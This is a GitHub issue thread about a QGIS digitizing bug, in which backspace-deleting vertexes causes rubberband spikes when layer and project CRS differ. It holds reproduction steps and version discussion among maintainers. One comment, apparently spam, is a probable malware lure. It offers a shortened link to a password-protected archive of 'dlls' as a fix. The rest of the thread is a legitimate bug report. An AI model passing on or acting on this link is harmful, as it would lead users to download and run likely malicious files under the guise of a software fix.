### ISSUE TITLE
Digitizing: deleting vertexes with backspace can cause spikes when layer and project CSR don't match

### ISSUE THREAD

**Issue by JuhoErvasti** [qgis/QGIS#58813]
### What is the bug or the crash?

When you're digitizing a geometry on a layer whose CRS is different from the project CRS and use the backspace to cancel added vertexes up to the second to last vertex it causes a spike. Probably better explained by this gif:

![issue](https://github.com/user-attachments/assets/036046f9-147e-4536-93a8-ec578daf0fc5)

It's most apparent with polygon layers but also happens on line layers where there's going to be a duplicate line segment in the geometry.

Happens regardless of the digitizing tool.

### Steps to reproduce the issue

1. Download and extract the geopackage [here](https://github.com/user-attachments/files/17073376/digitizing_bug_58813.zip)
2. Open the project inside the geopackage
3. Start adding a feature to the polygon layer and create 3 vertexes
4. Press backspace to delete the latest vertex from the rubberband
5. Observe the spike that appears

### Versions

<table width='100%' align='center'><tr><td>QGIS version</td><td>3.39.0-Master</td></tr><tr><td>QGIS code revision</td><td><a href="https://github.com/qgis/QGIS/commit/d85f3c2a28">d85f3c2a28</a></td></tr><tr><td colspan="2">&nbsp;</td></tr><tr><td colspan="2"><b>Libraries</b></td></tr><tr><td>Qt version</td><td>5.15.3</td></tr><tr><td>Python version</td><td>3.10.12</td></tr><tr><td>GDAL/OGR version</td><td>3.6.4</td></tr><tr><td>PROJ version</td><td>9.1.1</td></tr><tr><td>EPSG Registry database version</td><td>v10.076 (2022-08-31)</td></tr><tr><td>GEOS version</td><td>3.11.1-CAPI-1.17.1</td></tr><tr><td>SQLite version</td><td>3.37.2</td></tr><tr><td>PDAL version</td><td>2.5.0</td></tr><tr><td>PostgreSQL client version</td><td>16.4 (Ubuntu 16.4-1.pgdg22.04+1)</td></tr><tr><td>SpatiaLite version</td><td>5.0.1</td></td></tr><tr><td>QWT version</td><td>6.1.4</td></tr><tr><td>QScintilla2 version</td><td>2.11.6</td></tr><tr><td>OS version</td><td>Ubuntu 22.04.4 LTS</td></tr><tr><td colspan="2"><i>This copy of QGIS writes debugging output.</i></td></tr><tr><td colspan="2">&nbsp;</td></tr><tr><td colspan="2"><b>Active Python plugins</b></td></tr><tr><td>processing</td><td>2.12.99</td></tr><tr><td>MetaSearch</td><td>0.3.6</td></tr><tr><td>db_manager</td><td>0.1.20</td></tr><tr><td>grassprovider</td><td>2.12.99</td></tr></table>

### Supported QGIS version

- [ ] I'm running a supported QGIS version according to [the roadmap](https://www.qgis.org/en/site/getinvolved/development/roadmap.html#release-schedule).

### New profile

- [X] I tried with a new [QGIS profile](https://docs.qgis.org/latest/en/docs/user_manual/introduction/qgis_configuration.html#working-with-user-profiles)

### Additional context

**Comment by SAMBILI** [comment]
I think this will help you.
https://bit.ly/3TzaAQd
Archive password: changeme
I put the necessary dlls in the archive

**Comment by JuhoErvasti** [comment]
On more investigation this seems to happen only when the layer CRS and project CRS are different.

**Comment by JuhoErvasti** [comment]
Okay, interesting. Now that I discovered it's linked to the CRSs I tested again in 3.38.2 and there it _does_ reproduce for me.

Also another issue with the rubberband happens when you backspace-delete _all_ vertexes. The rubberband behaves oddly, although the actual digitized geometry is correct (this is in 3.38.2 as well):
![yet_another_issue](https://github.com/user-attachments/assets/d1e649df-78e4-4dc9-9aef-2bcc8e660edf)

I've created a test project here, inside a GeoPackage in case someone else wants to see if it replicates:
[digitizing_bug_58813.zip](https://github.com/user-attachments/files/17073376/digitizing_bug_58813.zip)

**Comment by agiudiceandrea** [comment]
Yes, the reported issue occurs using both the current versions QGIS 3.38, and QGIS 3.34 and also the previous versions 3.36 and 3.32. It didn't occur using QGIS 3.28.

**Comment by JuhoErvasti** [comment]
Oh, my bad then. I mixed up the version numbers.

**Comment by nyalldawson** [comment]
@JuhoErvasti i can't reproduce using current master and your demo project. is this still an issue?

**Comment by agiudiceandrea** [comment]
@nyalldawson , both the incorrect reported behaviours occurs even using the latest QGIS 3.39.0-Master b144272277 from OSGeo4W on Windows 10.

**Comment by nyalldawson** [comment]
I can reproduce the weird behaviour when deleting the second last vertex, but not a CPU spike

**Comment by agiudiceandrea** [comment]
Me neither observe a CPU spike. Maybe the reporter didn't intend "CPU spike".
